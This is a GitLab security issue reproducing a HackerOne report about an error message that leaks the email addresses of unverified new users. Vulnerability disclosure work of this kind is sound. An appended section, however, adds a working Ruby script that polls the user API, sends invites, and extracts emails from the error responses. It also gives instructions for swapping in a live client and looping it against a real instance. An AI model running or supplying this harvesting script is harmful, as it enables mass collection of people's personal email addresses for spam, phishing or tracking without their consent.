Leaking emails of newly created users
⚠ Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.
HackerOne report #1884672 by shells3c
on 2023-02-23, assigned to @fvpotvin:
Report
Summary
A GitLab error message leaks a user's email address in ee/app/models/ee/member.rb:

```ruby
def email_not_verified
  # user.email is interpolated into the message that is returned to the inviter
  _("email '%{email}' is not a verified email." % { email: user.email })
end
```
The error message only appears when you invite an unverified user to a group that restricts membership by email domain, which means only users who haven't verified their email are affected by this vulnerability. This is very unlikely to happen, as users have to verify their email addresses to log in. However, a possible attack scenario here is that the attack happens in between the sign-up and the confirmation, which I think usually only lasts some minutes. But it's exploitable because GitLab allows you to fetch the latest users (by creation time); a simple API query is enough to do this: `GET /api/v4/users`. So the script here is that the attacker automatically and continuously fetches new users from the API, feeds them to the Invite member API and collects the emails from the error messages.
Steps to reproduce
Note: You will need a Gitlab Enterprise server or a Premium Plan on gitlab.com (you can sign-up for a trial)
- Create a new user and don't confirm the email yet, remember the username
- Create a group, go to Settings > General > Restrict membership by email domain and add a random domain that doesn't exist
- Now go to Group information > Members, click Invite members and enter the username from step 1
- After clicking Invite, an error message will be returned with the email address
Steps to reproduce the real-life attack scenario (on gitlab.com):
- After creating a Premium group, go to Group information > Members, click Invite members
- Click the input box under Username or email address, after a few seconds of loading, a list of suggested users will appear, choose the user on top of them
- Click Invite and you will have a chance of revealing that user's email
- If "The member's email address is not allowed for this group" is the only error message you get, try again; after several failed attempts you will get at least one successful attempt
Output of checks
This bug happens on GitLab.com
Impact
Collecting email addresses from Gitlab
How To Reproduce
Please add reproducibility information to this section:
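The harvesting loop the report describes (poll the newest users, try to invite each one into a domain-restricted group, pull the email out of the validation error), written as an added example in Ruby. It is not part of the original report or of GitLab's code base. The user-list query parameters (`order_by=created_at&sort=desc`), the members endpoint form fields, and the JSON shape of the error body are assumptions based on the public API documentation and the message string in ee/app/models/ee/member.rb; `StubClient` is a constructed stand-in for the two endpoints so the script runs offline, and `GitLabClient` is the equivalent live client. `safe_email_not_verified` is an illustrative hardened message, not GitLab's actual fix.

```ruby
require 'json'
require 'net/http'
require 'uri'

# Matches the message built by Member#email_not_verified.
EMAIL_RE = /email '([^']+)' is not a verified email\./

# Walk any JSON structure (hash / array / string) and return the first email
# found in an error string, or nil. Shape-agnostic because the members API
# nests validation messages under "message" (assumed shape, see lead-in).
def extract_email(body)
  case body
  when String
    m = EMAIL_RE.match(body)
    m && m[1]
  when Array
    body.each { |v| e = extract_email(v); return e if e }
    nil
  when Hash
    extract_email(body.values)
  end
end

# Live client: get(path) / post(path, form) -> parsed JSON. Not used in the demo.
class GitLabClient
  def initialize(base_url, token)
    @base = URI(base_url)
    @token = token
  end

  def get(path)
    do_request(Net::HTTP::Get.new(path, 'PRIVATE-TOKEN' => @token))
  end

  def post(path, form)
    req = Net::HTTP::Post.new(path, 'PRIVATE-TOKEN' => @token)
    req.set_form_data(form)
    do_request(req)
  end

  private

  def do_request(req)
    res = Net::HTTP.start(@base.host, @base.port, use_ssl: @base.scheme == 'https') { |h| h.request(req) }
    JSON.parse(res.body)
  end
end

# Constructed stand-in for the two endpoints, used instead of a live server.
class StubClient
  def initialize(users, emails)
    @users = users    # what GET /api/v4/users returns (newest first)
    @emails = emails  # user id -> email, only for accounts that are still unverified
  end

  def get(_path)
    @users
  end

  def post(_path, form)
    email = @emails[form['user_id']]
    if email
      { 'message' => { 'user' => ["email '#{email}' is not a verified email."] } }
    else
      { 'message' => "The member's email address is not allowed for this group" }
    end
  end
end

# One pass of the attack: list the newest users, try to invite each one (as Guest,
# access_level 10) into a group whose allowed email domains cannot match, and
# collect the emails leaked by the validation error. `seen` lets a polling loop
# skip users it has already tried. Returns { username => email }.
def harvest_unverified_emails(client, group_id, seen = {})
  users = client.get('/api/v4/users?order_by=created_at&sort=desc&per_page=20')
  users.each_with_object({}) do |u, found|
    next if seen[u['id']]
    seen[u['id']] = true
    body = client.post("/api/v4/groups/#{group_id}/members",
                       'user_id' => u['id'], 'access_level' => 10)
    email = extract_email(body)
    found[u['username']] = email if email
  end
end

# Hardened message (illustrative only): report that the email is unverified
# without echoing the address back to the inviter.
def safe_email_not_verified
  "the member's email address is not a verified email."
end

if $PROGRAM_NAME == __FILE__
  users = [{ 'id' => 42, 'username' => 'fresh-signup' }, { 'id' => 41, 'username' => 'old-user' }]
  stub = StubClient.new(users, 42 => 'victim@example.com')
  p harvest_unverified_emails(stub, 1234)
end
```

Against a live instance, swap `StubClient` for `GitLabClient.new('https://gitlab.example', token)` and call `harvest_unverified_emails` in a loop with a shared `seen` hash; only accounts still inside the sign-up to confirmation window produce a hit, which is why the report notes that repeated attempts are needed.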